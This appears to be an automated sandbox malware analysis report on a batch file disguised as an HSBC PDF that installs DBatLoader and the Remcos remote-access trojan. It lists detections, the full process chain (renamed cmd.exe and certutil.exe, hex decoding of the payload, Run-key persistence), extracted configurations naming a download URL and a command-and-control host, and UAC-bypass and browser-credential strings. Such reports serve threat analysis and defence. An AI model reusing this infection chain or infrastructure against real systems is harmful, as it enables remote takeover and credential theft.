
Windows Analysis Report
USD470900_COPY_800BLHSBC882001.PDF.bat

Overview

General Information

Sample name: USD470900_COPY_800BLHSBC882001.PDF.bat
Analysis ID: 1559105
MD5: c96743116088d21b52516f16f4866f69
SHA1: 9b9d500993f74ed975945419b6a25c03e80d8400
SHA256: 58348cc94b984ca026fa0a319b93ac988a394ed3d5ec39c01c47a8e762ebdb16
Tags: bat, HSBC, user-abuse_ch

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Machine Learning detection for dropped file
Queues an APC in another process (thread injection)
Registers a new ROOT certificate
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7588 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7608 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7620 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7648 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7664 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7716 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7732 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • AnyDesk.PIF (PID: 7748 cmdline: C:\Users\Public\Libraries\AnyDesk.PIF MD5: DF6F291F617D9DBAE8F32FB11ECD59C1)
      • cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hgkvgoaF.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 7948 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • esentutl.exe (PID: 7988 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 8020 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Faogvkgh.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SndVol.exe (PID: 8072 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
    • alpha.exe (PID: 7760 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7780 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • Faogvkgh.PIF (PID: 6888 cmdline: "C:\Users\Public\Libraries\Faogvkgh.PIF" MD5: DF6F291F617D9DBAE8F32FB11ECD59C1)
    • SndVol.exe (PID: 5612 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Faogvkgh.PIF (PID: 2068 cmdline: "C:\Users\Public\Libraries\Faogvkgh.PIF" MD5: DF6F291F617D9DBAE8F32FB11ECD59C1)
    • SndVol.exe (PID: 7296 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

DBatLoader configuration:
{"Download Url": ["http://ferreiragascuritiba.com.br/v/233_Faogvkghvqn"]}

Remcos configuration:
{"Host:Port:Password": ["127.0.0.1:47666:1", "iamblessed.duckdns.org:47666:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-H5EBMC", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source | Rule | Description | Author | Strings
Source: 00000019.00000002.1714791876.0000000000647000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_DBatLoader | Description: Yara detected DBatLoader | Author: Joe Security
Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x691e0:$a1: Remcos restarted by watchdog!
  • 0x69738:$a3: %02i:%02i:%02i:%03i
  • 0x69abd:$a4: * Remcos v
Source | Rule | Description | Author | Strings
Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x691e0:$a1: Remcos restarted by watchdog!
  • 0x69738:$a3: %02i:%02i:%02i:%03i
  • 0x69abd:$a4: * Remcos v
Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
  • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6320c:$str_b2: Executing file:
  • 0x64328:$str_b3: GetDirectListeningPort
  • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x63e30:$str_b7: \update.vbs
  • 0x63234:$str_b9: Downloaded file:
  • 0x63220:$str_b10: Downloading file:
  • 0x632c4:$str_b12: Failed to upload file:
  • 0x642f0:$str_b13: StartForward
  • 0x64310:$str_b14: StopForward
  • 0x63dd8:$str_b15: fso.DeleteFile "
  • 0x63d6c:$str_b16: On Error Resume Next
  • 0x63e08:$str_b17: fso.DeleteFolder "
  • 0x632b4:$str_b18: Uploaded file:
  • 0x63274:$str_b19: Unable to delete:
  • 0x63da0:$str_b20: while fso.FileExists("
  • 0x63749:$str_c0: [Firefox StoredLogins not found]
Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | Description: detects Windows executables potentially bypassing UAC using eventvwr.exe | Author: ditekSHen
  • 0x63100:$s1: \Classes\mscfile\shell\open\command
  • 0x63160:$s1: \Classes\mscfile\shell\open\command
  • 0x63148:$s2: eventvwr.exe
Source: 25.2.SndVol.exe.27d0000.0.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security

System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 7748, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7496, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7608, ProcessName: alpha.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Faogvkgh.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 7748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Faogvkgh
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7608, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7620, ProcessName: extrac32.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 216.172.172.178, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\AnyDesk.PIF, Initiated: true, ProcessId: 7748, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49706
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Faogvkgh.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 7748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Faogvkgh
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\AnyDesk.PIF, NewProcessName: C:\Users\Public\Libraries\AnyDesk.PIF, OriginalFileName: C:\Users\Public\Libraries\AnyDesk.PIF, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7496, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 7748, ProcessName: AnyDesk.PIF

Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: 5D 75 B6 54 7C 5B 05 A0 CD D5 17 06 F3 2B 17 08 96 5D 2F B3 36 CB 86 F5 3D A1 68 FD 22 7C B7 33 08 77 3C 7D EE E7 83 CF D4 FC 1C 29 CA DE 1D B0 F1 08 D3 55 27 7D C9 8D 95 65 19 D5 B8 8F, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\SndVol.exe, ProcessId: 8072, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-H5EBMC\exepath

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T07:53:20.198467+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49709 | 77.221.149.38 | 47666 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T07:53:21.628365+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.8 | 49710 | 178.237.33.50 | 80 | TCP


AV Detection

Source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["127.0.0.1:47666:1", "iamblessed.duckdns.org:47666:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-H5EBMC", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source: 18.3.esentutl.exe.4d20000.0.unpack | Malware Configuration Extractor: DBatLoader {"Download Url": ["http://ferreiragascuritiba.com.br/v/233_Faogvkghvqn"]}
Source: C:\Users\Public\Libraries\AnyDesk.PIF | ReversingLabs: Detection: 31%
Source: C:\Users\Public\Libraries\Faogvkgh.PIF | ReversingLabs: Detection: 31%
Source: USD470900_COPY_800BLHSBC882001.PDF.bat | ReversingLabs: Detection: 18%
Source: Yara match | File source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000019.00000002.1714791876.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1661654615.000000002AB37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Faogvkgh.PIF | Joe Sandbox ML: detected
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC94CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68FC94CA0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC06C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF68FC06C4C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0C3C NCryptExportKey,#205,#359,#359,#357,7_2_00007FF68FCA0C3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD8C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF68FCD8C58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6C30 NCryptOpenStorageProvider,#360,7_2_00007FF68FCD6C30
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,7_2_00007FF68FC3CC24
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68FCA2BC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD0BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,7_2_00007FF68FCD0BF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,7_2_00007FF68FCA0B80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCCBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,7_2_00007FF68FCCCBB4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,7_2_00007FF68FC2CB98
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD0B9C CryptHashData,GetLastError,#357,7_2_00007FF68FCD0B9C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,7_2_00007FF68FD0EB38
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC42B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,7_2_00007FF68FC42B00
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC98AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68FC98AFC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF68FCA0ABC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,7_2_00007FF68FCA2AE4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD2A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,7_2_00007FF68FCD2A78
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC16A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,7_2_00007FF68FC16A84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF68FC8EA7C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCA8AA0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,7_2_00007FF68FC8AA00
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC84A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,7_2_00007FF68FC84A34
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0A18 BCryptSetProperty,#205,#359,#357,#357,7_2_00007FF68FCA0A18
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,7_2_00007FF68FCA4A1C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDA9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68FCDA9F0
